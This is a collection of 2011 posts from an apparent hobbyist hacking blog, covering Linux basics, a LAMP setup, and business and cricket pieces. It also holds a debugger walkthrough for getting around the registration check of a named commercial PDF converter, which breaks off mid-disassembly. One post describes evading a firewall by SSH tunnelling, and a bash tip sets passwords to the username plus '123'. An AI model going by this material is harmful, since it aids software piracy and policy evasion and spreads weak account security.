While Lamo thinks he shouldn’t have been confined against his will, he says most of the hospital staff were well-intentioned and professional, and he’s been happier since the incident. “Many of them were beautiful people who had a great deal of genuine concern for their patients, and I feel that I benefited from their attention,” he says.
He tried to help them, as well. After the staff discovered his hacking past, they began seeking him out for computer advice. “The questions changed from, ‘Do you know where you are? What’s today’s date?,’ to, ‘Hey, I have a Mac.”
“They also untaped the login and password from the state mental health-database terminal at a nurse’s station,” he adds.
Today, he says, “I feel less sedated, more social, and I feel better able to carry out the day-to-day functions of the average member of society.
“I still can’t say if the situation were to be repeated back at the Safeway, that they wouldn’t look at me and say, ‘Yeah, yeah, better get him in.’”

i Guess i have it ..!! Check with yours with the Facts, I Confirmed after reading Wikipedia Article Chek em Out:

Asperger Syndrome

Happy Hacking & Keep Hunting

Create a User Acc Using Bash Script in Linux

noreply@blogger.com (h4ckfreak) — Fri, 21 Oct 2011 12:50:00 +0000

These two scripts are very important for the system admin who regularly works with mail servers and somehow forgets to backup his system username and password! Let’s say somehow we lost the usernames and passwords of the mail server. In this case the admin has to manually create all the users and then change the passwords for all the users. Tedious job. Let’s make our life easier.

Before we jump in , For those who dont who kno what Bash file and how to create that ? click the link for refrence Bash Guide

First create a file which contains all the user name. Something like this:

INFILTRATOR
SUREN GREY HAT
WILL MATHEWS
jOSHUSA
pHIL

Risab Dang

Save the file as userlist.txt. Now create the following bash file:

#!/bin/sh
for i in `more userlist.txt `
do
echo $i
adduser $i
done

Save the file and exit.

chmod 755 userlist.txt

ow run the file:

./userlist.txt

This will add all the users to the system. Now we have to change the passwords. Let's say we want username123 as password. So for user SUREN GREY HAT the password will be suren123, rubi123 for user rubi and so on.

Create another bash file as follows:

#!/bin/sh
for i in `more userlist.txt `
do
echo $i
echo $i"123" | passwd –-stdin "$i"
echo; echo "User $username’s password changed!"
done

Run the file. All the passwords are changed.

Thanks

Linux Commands For Beginners

noreply@blogger.com (h4ckfreak) — Fri, 21 Oct 2011 12:40:00 +0000

This short guide shows some important commands for your daily work on the Linux command line.

arch

Outputs the processor architecture.

$ arch

i686

cat

Outputs the contents of a file.

$ cat lorem.txt

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.

cd

Change the working directory.

$ cd /bin

chgrp

Change group ownership of files.

$ chgrp games moo.txt

chmod

Change access permissions of files.

$ chmod +x helloworld

chown

Change file owner and group.

# chown root lorem.txt

cksum

Print CRC checksum and byte counts of each file.

$ cksum lorem.txt moo.txt

3570240675 453 lorem.txt
4294967295 0 moo.txt

cp

Copies a file.

$ cp lorem.txt copy_of_lorem.txt

date

Outputs the current date and time.

$ date

Sat Mar 3 12:07:09 GMT 2007

df

Reports the amount of disk space used and available on filesystems.

$ df

Filesystem 1K-blocks Used Available Use% Mounted on<br>
/dev/simfs 39845888 218048 39627840 1% /

dir

List directory contents.

$ dir

copy_of_lorem.txt lorem.txt moo.txt www

du

Estimate file space usage.

$ du -h /bin

7.8M /bin

echo

Display a line of text.

$ echo foobar

foobar

exit

Cause the shell to exit.

$ exit

fgrep

Print lines matching a pattern in a file.

$ fgrep "irure dolor" lorem.txt

commodo consequat. Duis aute irure dolor in reprehenderit in voluptate

find

Search for files in a directory hierarchy.

$ find hello*

hello_world
hello_world.c

free

Display amount of free and used memory in the system.

$ free

             total       used       free     shared    buffers     cached
Mem:       8299892    8287708      12184          0    2641772    1731236
Low:       3581300    3572764       8536
High:      4718592    4714944       3648
-/+ buffers/cache:    3914700    4385192
Swap:      8193140    2335664    5857476

grep

Print lines matching a pattern.

$ grep -i apple fruitlist.txt

apple

groups

Outputs the user groups of which your account belongs to.

$ groups

games users

head

Output the first part of files.

$ head -2 lorem.txt

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod
tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim

hostname

Outputs the machines hostname on the network.

$ hostname

anapnea.net

id

Outputs user id, group id, and groups of your account.

$ id

uid=1478(smallfoot) gid=100(users) groups=35(games),100(users)

kill

End a process.

$ kill -9 18298

-bash: kill: (18298) - Operation not permitted

killall

Kill processes by name.

$ killall irssi

irssi(18298): Operation not permitted
irssi(13372): Operation not permitted
irssi(22048): Operation not permitted
irssi: no process killed

last

Show listing of last logged in users.

$ last -n 3

alice    pts/6        192.0.34.166     Fri May 18 16:17   still logged in
bob      pts/2        64.233.183.103   Fri May 18 16:17   still logged in
clare    pts/6        72.5.124.61      Fri May 18 15:54 - 15:55  (00:01)

ldd

Print shared library dependencies.

$ ldd /bin/bash

        libncurses.so.5 => /lib/libncurses.so.5 (0x40023000)
        libdl.so.2 => /lib/libdl.so.2 (0x40065000)
        libc.so.6 => /lib/libc.so.6 (0x40069000)
        /lib/ld-linux.so.2 (0x40000000)

ln

Make links between files.

$ ln -s data.txt symlink.txt

logname

Print user's login name.

$ logname

smallfoot

ls

List directory contents.

$ ls

copy_of_lorem.txt lorem.txt moo.txt www

man

Opens the manual page for a software or function.

$ man bash

md5sum

Outputs the MD5 hash sum of a file.

$ md5sum lorem.txt

56da9e37259af34345895883e6fd1a27 lorem.txt

mkdir

Makes a directory.

$ mkdir foobar

mv

Moves a file.

$ mv lorem.txt ipsum.txt

nl

Number lines of files.

$ nl lorem.txt

     1  Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod
     2  tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim
     3  veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea
     4  commodo consequat. Duis aute irure dolor in reprehenderit in voluptate
     5  velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint
     6  occaecat cupidatat non proident, sunt in culpa qui officia deserunt
     7  mollit anim id est laborum.

nm

List symbols from object files.

$ nm hello_world

080494a0 D _DYNAMIC
0804956c D _GLOBAL_OFFSET_TABLE_
08048474 R _IO_stdin_used
w _Jv_RegisterClasses
08049490 d __CTOR_END__
0804948c d __CTOR_LIST__
08049498 d __DTOR_END__
...

od

Dump files in octal and other formats.

$ od -t x /bin/sh

2376640 00098020 000054d4 00000000 00000000
2376660 00000020 00000000 000000c7 00000008
2376700 00000003 080e6500 0009d4f4 00004ae8
...

pidof

Find the process ID of a running program.

$ pidof fetchmail

22392

ping

Pings a host.

$ ping -c 2 127.0.0.1

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.048 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.052 ms

--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.048/0.050/0.052/0.002 ms

ps

Outputs running processes.

$ ps

  PID TTY          TIME CMD
21542 pts/12   00:00:00 bash
27706 pts/12   00:00:00 ps

pstree

Display a tree of processes.

$ pstree

pwd

Outputs the name of current working directory.

$ pwd

/home/smallfoot

rm

Removes a file or directory.

$ rm lorem.txt

rmdir

Removes a directory.

$ rmdir foobar

sed

Stream editor for filtering and transforming text.

$ echo "My cat's name is Bob" | sed -e 's/Bob/Mittens/g'

My cat's name is Mittens

sha1sum

Outputs the SHA1 hash sum of a file.

$ sha1sum lorem.txt

c942ddebd142ec8bacac9213d48096e74bab4957 lorem.txt

shutdown

Bring the system down in a secure way. All logged-in users are notified that the system is going down.

$ shutdown now

size

List section sizes and total size.

$ size /bin/bash

text data bss dec hex filename
621233 22712 19176 663121 a1e51 /bin/bash

stat

Outputs file status.

$ stat lorem.txt

  File: `lorem.txt'
  Size: 453             Blocks: 8          IO Block: 4096   regular file
Device: 77h/119d        Inode: 27312217    Links: 1
Access: (0644/-rw-r--r--)  Uid: ( 1478/smallfoot)   Gid: (  100/   users)
Access: 2007-03-03 12:24:39.000000000 +0000
Modify: 2007-03-03 12:24:39.000000000 +0000
Change: 2007-03-03 12:24:39.000000000 +0000

strings

Print the strings of printable characters in files.

$ strings hello_world

/lib/ld-linux.so.2
_Jv_RegisterClasses
__gmon_start__
libc.so.6
puts
_IO_stdin_used
__libc_start_main
GLIBC_2.0
PTRh%
[^_]
Hello World!

tail

Output the last part of files.

$ tail -2 lorem.txt

occaecat cupidatat non proident, sunt in culpa qui officia deserunt
mollit anim id est laborum.

talk

Talk to another user.

$ talk bob Lookout for the dopefish!

touch

Change a file's access and modification timestamps. If file does not exist, create it.

$ touch lorem.txt

tty

Outputs the name of the current terminal.

$ tty

/dev/pts/16

uname

Outputs operating system, hostname, kernel version, date and timp, and processor.

$ uname -a

Linux anapnea.net 2.6.9 #1 SMP Wed Jul 19 16:24:18 MSD 2006 i686 Intel(R) Xeon(TM) CPU 2.80GHz GenuineIntel GNU/Linux

uptime

Outputs the system uptime.

$ uptime

14:50:26 up 7 days, 17:52, 18 users, load average: 0.08, 0.02, 0.01

users

Print the user names of users currently logged in to the current host.

$ users

alice bob charlie eve

vdir

List directory contents.

$ vdir

total 8
-rw-r--r-- 1 smallfoot users 453 Mar 3 12:32 copy_of_lorem.txt
-rw-r--r-- 1 smallfoot users 453 Mar 3 12:24 lorem.txt
-rw-r--r-- 1 smallfoot users 0 Mar 3 12:32 moo.txt
lrwxr-xr-x 1 root root 18 Feb 27 19:33 www -> /var/www/smallfoot

w

Show who is logged on and what they are doing.

$ w

12:14:30 up 5 days, 15:16, 19 users,  load average: 0.00, 0.00, 0.00
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
charlie  pts/0     Fri21    3:26m  2.52s  2.52s irssi
alice    pts/2     Wed17   30:21m  0.00s  0.00s -bash
emma     pts/4     11:37   36:57   0.00s  0.00s -bash
frank    pts/5     11:48   11:03   0.00s  0.00s -bash
smallfoo pts/12    12:01    0.00s  0.04s  0.01s w

wall

Send a message to everybody's terminal.

$ wall next week we change the server for a new one

wc

Counts lines in a file.

$ wc -l lorem.txt

7 lorem.txt

whatis

Search the whatis database for complete words.

$ whatis bash

bash (1) - GNU Bourne-Again SHell
bash [builtins] (1) - bash built-in commands, see bash(1)

who

Outputs who is currently logged into the system.

$ who

charlie  pts/0        Mar  2 21:37 (xtreme-11-65.acme.com)
alice    pts/2        Feb 28 17:48 (147.21.16.3)
emma     pts/4        Mar  3 11:37 (32.84-48-181.uac.com)
frank    pts/5        Mar  3 11:48 (port-212-202-233-2.foobar.org)
smallfoot pts/12       Mar  3 12:01 (c-12776f4.cust.example.net)

whereis

Locate the binary, source, and manual page files for a command.

$ whereis bash

bash: /bin/bash /etc/bash /usr/share/man/man1/bash.1.gz

whoami

Outputs your username / the name of your account.

$ whoami

smallfoot

INSTALLING LAMP on Ubuntu 11.xx Tutorial

noreply@blogger.com (h4ckfreak) — Fri, 21 Oct 2011 12:33:00 +0000

LAMP is short for Linux, Apache, MySQL, PHP. This tutorial shows how you can install an Apache2 webserver on an Ubuntu 11.10 server with PHP5 support (mod_php) and MySQL support.
I do not issue any guarantee that this will work for you!

1 Preliminary Note

In this tutorial I use the hostname server1.example.com with the IP address 192.168.0.23. These settings might differ for you, so you have to replace them where appropriate.
I'm running all the steps in this tutorial with root privileges, so make sure you're logged in as root:

sudo su

2 Installing MySQL 5

First we install MySQL 5 like this:

apt-get install mysql-server mysql-client

You will be asked to provide a password for the MySQL root user - this password is valid for the user root@localhost as well as root@server1.example.com, so we don't have to specify a MySQL root password manually later on:
New password for the MySQL "root" user: <-- yourrootsqlpassword
Repeat password for the MySQL "root" user: <-- yourrootsqlpassword

3 Installing Apache2

Apache2 is available as an Ubuntu package, therefore we can install it like this:

apt-get install apache2

Now direct your browser to http://192.168.0.23, and you should see the Apache2 placeholder page (It works!):

Apache's default document root is /var/www on Ubuntu, and the configuration file is /etc/apache2/apache2.conf. Additional configurations are stored in subdirectories of the /etc/apache2 directory such as /etc/apache2/mods-enabled (for Apache modules), /etc/apache2/sites-enabled (for virtual hosts), and /etc/apache2/conf.d.

4 Installing PHP5

We can install PHP5 and the Apache PHP5 module as follows:

apt-get install php5 libapache2-mod-php5

We must restart Apache afterwards:

/etc/init.d/apache2 restart

5 Testing PHP5 / Getting Details About Your PHP5 Installation

The document root of the default web site is /var/www. We will now create a small PHP file (info.php) in that directory and call it in a browser. The file will display lots of useful details about our PHP installation, such as the installed PHP version.

vi /var/www/info.php

Now we call that file in a browser (e.g. http://192.168.0.23/info.php):

Click Image to Enlarge

As you see, PHP5 is working, and it's working through the Apache 2.0 Handler, as shown in the Server API line. If you scroll further down, you will see all modules that are already enabled in PHP5. MySQL is not listed there which means we don't have MySQL support in PHP5 yet.

6 Getting MySQL Support In PHP5

To get MySQL support in PHP, we can install the php5-mysql package. It's a good idea to install some other PHP5 modules as well as you might need them for your applications. You can search for available PHP5 modules like this:

apt-cache search php5

Pick the ones you need and install them like this:

apt-get install php5-mysql php5-curl php5-gd php5-idn php-pear php5-imagick php5-imap php5-mcrypt php5-memcache php5-ming php5-ps php5-pspell php5-recode php5-snmp php5-sqlite php5-tidy php5-xmlrpc php5-xsl

Now restart Apache2:

/etc/init.d/apache2 restart

Now reload http://192.168.0.23/info.php in your browser and scroll down to the modules section again. You should now find lots of new modules there, including the MySQL module:

7 phpMyAdmin

phpMyAdmin is a web interface through which you can manage your MySQL databases. It's a good idea to install it:

apt-get install phpmyadmin

You will see the following questions:
Web server to reconfigure automatically: <-- apache2
Configure database for phpmyadmin with dbconfig-common? <-- No
Afterwards, you can access phpMyAdmin under http://192.168.0.23/phpmyadmin/:

iF U HAVE FURTHER Doubts , Refere the below links thanks

Mark Zuckerberg Uses Android Phone Finally

noreply@blogger.com (h4ckfreak) — Mon, 17 Oct 2011 10:29:00 +0000

If his recent Facebook activity has to be believed, than Facebook’s founder and CEO might have just ditched his iPhone for Android. It was only last month when Mark made the headlines for switching to iPhone (it was 3GS, not iPhone 4) from BlackBerry. But the experience wasn’t all that great as he posted about his frustrations with the device, citing poor battery life, and phone calling quality. He also said that he will get the new iPhone 4 and see if that solves all his problems before switching to Android.

Mark Zuckerberg Profile on Facebook, June 2010

And now according to his recent Facebook activity, it looks like he has finally gone for an Android phone.

Mark Zuckerberg Profile on Facebook, July 2011

But given the amount of revenues that he generates from the most popular social networking site, I wouldn’t be surprised if he keeps both the iPhone 4 and an Android phone to fulfill all his needs.
Oh and now that Zuckerberg is using an Android phone, we may finally see an update for Facebook for Android app which badly needs to get updated to come on-par with the iPhone version.

Lessons from Dhoni’s Leadership

noreply@blogger.com (h4ckfreak) — Tue, 13 Sep 2011 08:37:00 +0000

Dhoni gives the following Leadership tips for every aspiring Leader :
1. We should be a performer and we should demonstrate the same to our team. Performance is itself the most effective communication down the line.
2. Leader has to be humble in way to consider part and parcel of the team and not above the team.
3. Give genuine respect and trust to the team members.
4. Allow them to experiment and take risk.
5. In case of failure, encourage him / her to introspect and do it next time with more vigour and better planning.
6. Make every one in the team feel that , even though we are leaders, we are just one among them.
7. We should also believe in the ones who failed in the Team. At crucial times a team member who was not able to deliver might do miracles.
8. As a leader, be calm in extreme situations and lead the team from front.
9. Share the credit of success with your team members and praise them in public.
10. Above all believe in every member in the team.

When Ganguly was playing his last match, as a gesture of respect, Dhoni asked Ganguly to take charge of the team when the ninth Aussie wicket fell. Whenever he has an opportunity, he showers his players with praises

Managing under change is a vital attribute to be learned from the leadership under Dhoni. A good leader doesn’t mind going out and exploring. Dhoni’s risk taking ability, inclusiveness and time-pressure qualities are good examples of leaders on the business side.

If you notice, instead of pressing teammates to win, Dhoni told them to just enjoy the game. Also, he has mentioned at several forums that he believes to live in the present and not worry about future or past.. Dhoni’s leadership style represents teamwork, empowerment and confidence.

Dhoni utilizes every team member at his disposal and brings out the best performance whether he is a senior or junior player. He provides opportunity for every team member to prove themselves and contribute to the best of their abilities.

Remember, he gave the last over to Joginder Sharma who doesn’t have much a track record., By putting such a person in front of a challenging task, it tells the person that the leader has confidence in his abilities and will be fired up to put in 120 per cent. This happened with Joginder Sharma in two critical matches, where he was hit all around the ground and still given the last over. He delivered on both instances!

Leaders need to be assertive yet humble and must rarely allow their personal egos to be an obstacle for the success of their organization and that’s what M.S. Dhoni showing us through his current leadership style.

Another learning from Dhoni is about, Optimal utilization of resources, which is vital for any business. Instead of giving excuses for lack of best resources, especially with the current scenario economic crisis, it is better to perform in whatever resources a leader has to his disposal

His ‘people management’ skills tell us, he is truly a great leader. When team members see their leader calm in extreme situations, they will not be rattled. It will enable them to focus on their work and do what is expected of them. Dhoni was always calm – whether the bowler started off the last over in the finals with a wide ball or the batsman played a series of dot balls in a slog over.

Mahendra Singh Dhoni is a forthright, straightforward cricketer unburdened by the baggage that generally accompanies a man onto the field, thereby restricting his outlook. At once he is intelligent and simple, aggressive and canny, tough and respectful.

Dhoni’s Inspiring Quotes

When asked why he was not happy at the moment of victory at the post match conference, Dhoni replied, “I didn’t like way we played. With such a strong batting display, we should have won comfortably”. Would you ever expect the captain of a team not celebrate the moment of victory in a match that almost went down to the wire?

“I never predict what will happen in cricket. We believe in each other and we believe in the process. We will take each game in the right frame of mind,” he said

“We are not thinking about what may happen if we achieve or what may happen if we don’t succeed because those two things are beyond our control. So rather than thinking about something that’s too much ahead of us it is very important to take every game in the right frame of mind and that is what will be our process throughout the tournament,” he clarified

“If you have not achieved something, there’s pressure on you to achieve it. Once you have achieved it, there is pressure to sustain it. Nothing comes easy.”

“We didn’t rely on one specific individual, everybody contributed. Each and every batsman scored at some point in the series and the same applies to the bowlers also.”

In a nutshell Dhoni’s story is all about an ordinary man doing extraordinary things and a role model for every aspiring leader. Each one of us could use this model, pattern and design to create our leadership journey.

30 lessons from Infosys Narayana Murthy

noreply@blogger.com (h4ckfreak) — Tue, 13 Sep 2011 08:05:00 +0000

NR Narayana Murthy, who steps down as Infosys chairman on August 20, is a role model for not just what he achieved but also how he did it. Here are 30 lessons from Murthy, one for each year he spent at company.
1-Seize Your Gandhi Moment
Murthy, a self proclaimed socialist in the mid ’70s was jailed for 72 hours in Bulgaria. The experience taught him that entrepreneurship and job creation is the way to alleviate poverty.
2-You might fail, but get started Learn from mistakes and move on.
In 1976, Murthy founded Softronics, a company that lasted a year and a half. When he realised that his first venture wasn’t taking off, he moved on.
3-Think Big. Don’t Hesitate to Start Small
In 1981, a determined Murthy started Infosys with Rs 10,000 he borrowed from his wife. In few years, Infosys went on to become one of the largest wealth creators in the country.
4-Cut Yourself a Slice, Not a Large One Always
When Infosys was set up, Murthy took a pay cut while salaries of other co-founder’s were increased by 10 percent. According to Murthy, a leader needs to show his or her sacrifice and commitment
.5-Lend a Hand and Throw in a Foot Too.
After Murthy convinced seven of his colleagues, there was a problem. Nandan’s future inlaws were not sure about him. Murthy met Nandan’s uncle and convinced him.
6-Own Up, and Then Clean Up
In the ’80s Infosys developed an application for a German client. Murthy noticed a single character error and informed the client immediately.
7-Trust in God, But Verify with Data
In God we trust, the rest must come with data, is perhaps Murthy’s favourite statement. When confronted with difficult decisions, he tends to rely on data.
8-Keep the Faith
Infosys almost wound up in 1990. Murthy did not want to sell the company. He asked co-founders if they wanted out and offered to buy their shares. All of them stuck together.
9-Get Involved
Infosys won a contract from Reebok in the early ’90s. Seeing the founders involvement, the software, was nick named ‘Dinesh, Murthy and Prahlad.’ Infy veterans still recall those days.
10-Sharing is Caring
After the IPO, Infosys decided to share a portion of its equity with employees. This helped them retain talent and gave employees a sense of ownership. Murthy is proud of having given away stocks worth over Rs 50,000 crore to employees.
11-Treat your People Good, but Your Best Better
Murthy always had a thing for good performers. And he rewarded them well. When Infosys decided to give its employees stock options, Murthy insisted that some shares be given to good performers through the ‘Chairman’s quota.’
12-Hire a Good Accountant, Even if he is Argumentative
A young, argumentative Indian, was asking too many questions at an annual general body meeting of Infosys. More impressed than irritated, he hired Mohandas Pai, who went on to help Infosys list on Nasdaq.
13-When in Doubt, Disclose
Keep your books clean and leave the cooking to the chef. Murthy’s philosophy about being open and transparent has given the company a lot of credibility. He often says, “When in doubt, please disclose.”
14-Leave the Family Out
Murthy told his wife that only one of them could be with the company. Murthy, along with other founders, said that none of their children would work for Infosys. This left no room for nepotism at Infosys.
15-Don’t be a Push over
In 1994, when General Electric wanted to re-negotiate rates, Murthy said no to selling services any cheaper. This helped Infosys not to be overly dependent on any one client.
16-Make hay While the Sun Shines
In late 90′s, India’s tech companies made use of the Y2K opportunity to make themselves known in the global market. For Infosys, it was a great opportunity to enter into long-term relationships with their customers.
17-Brand-aid First, Get Clinical
When the sexual harassment case against Infosys’ top sales guy Phaneesh Murthy threatened to tarnish the company’s brand, Murthy decided to quickly react. He let go of Phaneesh, and settled the case out of court despite Phaneesh wanting to fight it out.
18-Mind your Business, you’ll See Things Coming
Murthy carries and updates a mental model of Infosys’ business all the time. According to him, every leader must have a model, consisting of six to seven parameters that might affect business.
19-Keep it Simple, Not Silly
Keep your life simple and straight. That way, you get to work more and worry less. Murthy is known to be frugal with money. Despite being one of the richest Indians, he leads a simple life. However, he does not cut corners on buying books or brushing up on literature.
20-Founders Keepers, but Not Forever
Murthy’s decision to not allow founders to continue with the company after the age of 65 set another standard for the company. This way, younger leaders at Infosys had a greater chance at the top positions.
21-Talent Spotting and Division of Labour
Murthy is known to have an eye for talent and a talent for dividing labour. Nandan was given sales responsibilities while Kris and Shibu did the tech stuff. N S Raghavan was asked to handle people and Dinesh was assigned quality.
22-Hold on to Your People but don’t Cling
Letting go is never easy but its not good to cling on to your colleagues either. Amongst the founders, Ashok Arora, Nandan Nilekani and K Dinesh have quit Infosys. Infy veteran Mohandas Pai has also left Infosys.
23-Give, it only gets you more
In 2010, the Murthy’s donated $ 5.2 million USD to Harvard University Press for a project that aims to make India’s classical heritage available for generations to come. He is also supporter of the Akshaya Patra Foundation.
24-Do it First and Do it Right
Infosys did many things first. And most things right. For example, it was the first Indian company to list on Nasdaq. It was the first Indian company to make it to the Nasdaq 100 list and it was the first Indian company to attain the highest level of quality certification.
25-Perils of Being a Poster Child
Being the poster child of Indian IT industry, Infosys and Murthy have been at the receiving end of many criticisms. The company has been accused of taking away American jobs and been called a “chop shop.”
26-Get Rich. Honestly
Rich businesses were considered to be dirty in the days when the country had a socialist bent. Infy was a company which got rid of this sentiment. Murthy, with his ‘no compromise’ policy on greasing palms and doing ethical business, set the standards.
27-Do Not be Afraid to Court Controversy
Ever since Infosys became a success, Murthy was under constant public glare. This did not deter the straight talking Murthy from courting controversy or voicing his opinions openly.
28-Invest in Learning
With big investments in training, development and building facilities, India’s IT bell-weather has always been keen on grooming the younger generation. Murthy drove the culture of learning in the company in its early days
.
29-Never Lose the Common Touch
The big man of Indian IT kept his personal life simple. He lives in a simple, middle class house and flies economy till date. Murthy has always been accessible to people around him.
30-Do Good, Look Good
Murthy knew the importance of creating an image for Infosys. He invested in creating a sprawling, world class campuses early on, bigger than any other company’s headquarters in the country, that would make his global customers feel like they were in a global office.

An inside look at the National Security Agency (NSA).

noreply@blogger.com (h4ckfreak) — Thu, 08 Sep 2011 06:05:00 +0000

The following video is an official release by the NSA, for PR purposes.
The movie can also be found on the agency's Website.

The Must Watch for all Computer security enthusiasts,

Thanks

How to Bypass Firewall restrictions on outgoing Web connections, using SSH Tunneling

noreply@blogger.com (h4ckfreak) — Thu, 08 Sep 2011 05:56:00 +0000

The following procedure allows you to get to blocked Websites, from within a LAN which is subject to Firewall restrictions on outgoing HTTP connections (Web Filtering).

Step 1: How to set up an SSH server in Windows, using CopSSH (an implementation for Windows of OpenSSH).

Step 2: How to create an SSH Tunnel to the server, in order to bypass local Firewall restrictions on outgoing HTTP connections.

Doing the same as above, this time while using Linux instead of Windows (combination of Steps 1+2 described above):

Thanks to Ilan Altir

Hope this three will helped u for better understanding

Facebook Recruits NIT Warangal(India) Student For 45lakh per annum

noreply@blogger.com (h4ckfreak) — Tue, 30 Aug 2011 08:19:00 +0000

It's raining lucrative jobs at NIT Warangal which has had the best placement season so far. The 51-year-old institute started its recruitment drive on August 15 and already has a 21-year-old fourth year BTech computer science student securing the highest ever pay package of Rs 45 lakh per annum. The offer, made by Facebook, has created a record of sorts here. The institute confirmed that the student will be joining the technical wing of the social networking giant, as soon as he completes his course in March next year.

This has set a new benchmark at NIT Warangal in that the highest salary any student from the institute had bagged so far was Rs 20 lakh per annum. From the 2010-11 batch as many as three students had got jobs that paid them Rs 20 lakh per annum, sources at NIT said. It is not just the 21-year-old whizkid who has bagged a hefty package this year. According to sources, the salaries offered to students so far range anywhere between Rs 5 to Rs 12 lakh per annum. The recruitment process for this year that started on August 15 is expected to last till March 2012. Sources said that most of the recruiters so far are IT companies.

About 30 students from computer science stream of the institute have already been recruited. Eight companies have come in for recruitment in the first round so far. According to NIT officials, this year other than the usual brand of companies several new ones have expressed interest in hiring. "Companies have now shed the recession blues completely and are looking for fresh candidates to recruit. Many of them like Microsoft, Amazon, Oracle and Google could recruit more number of freshers than they did last year," said a senior professor from the institute. Last year, 92% students from the B Tech batch of the institute and 50 % students from M Tech batch were recruited by companies. The average pay package offered by companies last year was between Rs 6 and Rs 7 lakh per annum. The institute officials are expecting a considerable increase in the pay packages this year. NIT professors said that this year, several companies have been vying for the first interview slots with students.

"Most of the IT companies are willing to pay really well to bright students who get absorbed in the first or second interview. The companies who come for interviews later could offer bigger packages to students. We'll have to wait and watch what the salary trend this year is," said an official from NIT.

Reverse Engineering with "pdf2word" Live

noreply@blogger.com (h4ckfreak) — Sat, 27 Aug 2011 10:37:00 +0000

In This "tutorial" we will use a real program called PDF2Word.
I stumbled upon this program when trying to convert a pdf document to a word document (duh..).

The funny thing about this program is that it costs $39.95 and that it is released under the GPL.

Let's start shall we?

1: Obtain a copy of the program at http://www.verypdf.com/pdf2word/index.html
We will use version 2.6 in this tutorial.

2: Obtain a copy of ollydbg at http://www.ollydbg.de/

Start PDF2Word and you will see a screen with title "Please register .."
Type in an emailadress and a bogus Registrationkey and hit OK.
Write down the error message you get since we will need it later on:
"Series number error, please check it and try again."

Now close pdf2word and start Ollydbg. From within ollydbg go to file, open and browse to
C:\Program Files\PDF2Word v2.6\ and select pdf2rtf.exe.
Once the program is loaded rightclick somewhere in the code table and select Search for
Then select All referenced text strings".
A new window will open with all text strings in the program. Scroll up and rightclick once more.
Now select Search for text and put in the errorstring you had earlier in the program:
"Series number error, please check it and try again.".
deselect "Case Sensitive" and press OK.
You will see the following line highlighted:


00429F6F | PUSH pdf2rtf.00468270 |ASCII "Series number error,
 please check it and try again."

Now press to put a breakpoint on it. Directly above you will find some other strings
which might be of interest as well so put a breakpoint on them to. These are:
"Thank you registered" and "Thank you registered VeryPDF PDF2Word v1.6." Now double click on one of the lines and press <F9> to start the program.
The registration window will come up again, so now put in an emailaddress, a dummy registration-key
and press OK.

Go back to Olly and you will see the following line highlighted:


00429F6F PUSH pdf2rtf.00468270 ;|Text = "Series number error, 
please check it and try again."

This is our errormessage again and the program has stopped right before displaying it.
You can see this errormessage is part of a MessageBoxA call, this is the
API responsible for displaying the Message. If you look a couple of lines earlier you will
see another MessageBoxA call where instead of our errormessage now the
message "Thank you registered VeryPDF PDF2Word v1.6." is located.
This means that if we have the correct serial it will display the registered message, and if
we don't we will get the error.
The program will need to decide if your serial is correct before it can display any of these
messages. The code to do so is usually located close to the messages so scroll up a bit until
you see a piece of code containing a JNE,JE,JNZ or JZ. These are jumps that occur when a specific
event is met.
Usually the event is tested in the code directly in front of it.
In this case you should end up at the following lines:


00429F2E . 85C0 TEST EAX,EAX
00429F30 . 74 39 JE SHORT pdf2rtf.00429F6B

As you can see EAX is tested against itself which in this case will jump to 00429F6B if
EAX has the value 0.
if we trace the jump we will see that it will jump over the registered message and end up
right before the errormessage. This means that if EAX = 0 we will get the errormessage and
our serial is wrong.

At this point we could remove the JE SHORT pdf2rtf.00429F6B code and fill it with
NOP so we will always get the correct message since the jump is never made, but that won't help
here cause if you restart the program it will still ask you to register.

So we need to continue our search. We need to figure out where EAX is getting it's value from.
2 lines above TEST EAX,EAX we see


00429F26 . E8 F5F7FFFF CALL pdf2rtf.00429720

This is a call to a function somewhere else in the program and you can bet your life it is this
function that sets the EAX value.
And so we need to figure out what this function does. To do this we will put another breakpoint
at CALL pdf2rtf.00429720 by highlighting the line and press <F2>.
Now we want to restart the program to make it break on the function call. This is done by
pressing <CTRL>+<F2>. Select YES to the question asked (press left arrow and hit enter) and the program is restarted.
Now press <F9> again to let the program run.
You will see the registrationbox popup again, so put in an emailaddress and a bogus serial and press OK.

As you can see the program will break on the CALL pdf2rtf.00429720 line.
Now press <F7> to step into the call.
The first 4 lines are not of interest to us so we will start analyzing the code from 00429725.
The code we have there is


00429725 |. 8B7424 3C MOV ESI,DWORD PTR SS:[ESP+3C]
00429729 |. 57 PUSH EDI
0042972A |. 8A06 MOV AL,BYTE PTR DS:[ESI]
0042972C |. 8A4E 01 MOV CL,BYTE PTR DS:[ESI+1]
0042972F |. 8A56 0E MOV DL,BYTE PTR DS:[ESI+E]
00429732 |. 884424 18 MOV BYTE PTR SS:[ESP+18],AL
00429736 |. 32C0 XOR AL,AL
00429738 |. 884C24 30 MOV BYTE PTR SS:[ESP+30],CL
0042973C |. 8A4E 0F MOV CL,BYTE PTR DS:[ESI+F]
0042973F |. 884424 19 MOV BYTE PTR SS:[ESP+19],AL
00429743 |. 884424 31 MOV BYTE PTR SS:[ESP+31],AL
00429747 |. 884424 25 MOV BYTE PTR SS:[ESP+25],AL
0042974B |. 884424 0D MOV BYTE PTR SS:[ESP+D],AL

0042974F |. 8A46 02 MOV AL,BYTE PTR DS:[ESI+2]
00429752 |. 3C 24 CMP AL,24
